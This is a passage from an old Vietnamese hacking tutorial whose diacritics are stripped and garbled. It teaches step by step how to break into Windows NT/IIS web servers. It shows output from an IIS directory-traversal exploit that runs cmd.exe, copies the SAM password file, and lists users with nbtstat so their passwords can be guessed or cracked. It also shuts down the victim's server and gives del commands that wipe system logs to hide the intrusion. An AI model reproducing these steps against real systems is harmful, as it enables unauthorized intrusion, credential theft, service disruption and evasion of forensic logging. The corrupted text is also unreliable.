Professional Documents
Culture Documents
Copy \\127.0.0.1\Admin$\repair\sam._c:\
-----------------------------------------------------------------------------------------------Phn 5 : Set
nu bn mun hack mt website......tt nhin l phi m port 80..nu khng th cu hack
cho ai xem ?
ti lc dng lnh Set ri
sau y l kt qu m t tm thy......chng ta phn tch nghe....ch yu l mun bit
homepage n u thi.....
COMPUTERNAME=PENTIUMII
ComSpec=D:\WINNT\system32\cmd.exe
CONTENT_LENGTH=0
GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=*/*
HTTP_ACCEPT_LANGUAGE=zh-cn
HTTP_CONNECTION=Keep-Alive
HTTP_HOST= DAY LA SO IP CUA TUI..NHUNG TUI DEL
ROIHTTP_ACCEPT_ENCODING=gzip, deflate
HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)
NUMBER_OF_PROCESSORS=1
Os2LibPath=D:\WINNT\system32\os2\dll;
OS=Windows_NT
Path=D:\WINNT\system32;D:\WINNT
PATHEXT=.COM;.EXE;.BAT;.CMD
PATH_TRANSLATED=E:\vlroot DAY LA URL CUA HOMEPAGE CHI CAN NHIN
SAU DONG PATH_TRANSLATED= LA BIET NO O DAU O DAY LA E:\vlroot
PROCESSOR_ARCHITECTURE=x86
PROCESSOR_IDENTIFIER=x86 Family 6 Model 3 Stepping 3, GenuineIntel
PROCESSOR_LEVEL=6
PROCESSOR_REVISION=0303
PROMPT=$P$G
QUERY_STRING=/c+set
REMOTE_ADDR=XX.XX.XX.XX
REMOTE_HOST=XX.XX.XX.XX
REQUEST_METHOD=GET
SCRIPT_NAME=/scripts/..%2f../winnt/system32/cmd.exe
SERVER_NAME=XX.XX.XX.XX
SERVER_PORT=80
SERVER_PORT_SECURE=0
SERVER_PROTOCOL=HTTP/1.1
SERVER_SOFTWARE=Microsoft-IIS/3.0
SystemDrive=D:
SystemRoot=D:\WINNT
TZ=GMT-9
USERPROFILE=D:\WINNT\Profiles\Default User
windir=D:\WINNT
y l cch kh ngu..nhng ch c cch ny mi 100% bit uc homepage tn g.. ?
khi cu Dir ..chc chn l s View c rt nhiu files y`.....
--------------------------------------------------------------------------------------phn 6 : Nbtstat
nu cu Scan uc mt my s dng Winnt...open port 135-139...th th b phi dng
lnh ny bit thm user thi...
* tin th xin ni lun...y l netbios....sau khi c user ri bn c th on m
password..nu khng thi Cracking lun i
Nbtstat - A XXX.XXX.XXX.XXX
sau y l kt qu t scan c.....
NetBIOS Remote Machine Name Table
Name Type Status
--------------------------------------------Registered Registered Registered Registered Registered Registered Registered Reg
istered Registered Registered Registered
MAC Address = 00-E0-29-14-35-BA
PENTIUMII <00> UNIQUE
PENTIUMII <20> UNIQUE
ORAHOTOWN <00> GROUP
ORAHOTOWN <1C> GROUP
ORAHOTOWN <1B> UNIQUE
PENTIUMII <03> UNIQUE
INet~Services <1C> GROUP
IS~PENTIUMII...<00> UNIQUE
ORAHOTOWN <1E> GROUP
ORAHOTOWN <1D> UNIQUE
..__MSBROWSE__.<01> GROUP
kt qu cho bit User l PENTIUMII
-------------------------------------------------------------------------------------------
Phn 7 : Shutdown
nhn lnh thi cng bit ri phi hng ? y l lnh shutdown server Winnt
Shutdown \\127.0.0.1 t:20
20 giy sau...Winnt s t khi ng li.......hi vng cc bn suy ngh k trc khi dng
lnh ny....v n s lm tn tht rt nng cho victim...hy lm tay hacker c o c
-------------------------------------------------------------------------------------------------------------------------------Phn 8 : Dir....
lnh ny khng c g ni ht..ch dng view thi.................
----------------------------------------------------------------------------------------------Phn 9 : Del
lnh ny ging nh xo nht k vy .....khi chng ta xm nhp my tnh...trn h thng
s lu li thng tin ca chng ta..v th..nn del n i...ch mun b tm c h ?
sau y l nhng files nht k ca Winnt
del C:\winnt\system32\logfiles\*.*
del C:\winnt\ssytem32\config\*.evt
del C:\winnt\system32\dtclog\*.*
del C:\winnt\system32\*.log
del C:\winnt\system32\*.txt
del C:\winnt\*.txt
del C:\winnt\*.log
ch cn del ht l coi nh xong
Nhng lnh trong ms dos cn rt nhiu....nh lnh ECHO
.....FTP.........ATTRIB.......nhng v cn nhiu lm...t khng ti no cp ht trong mt
bi...mong cc bn hiu cho v thng cm nghe......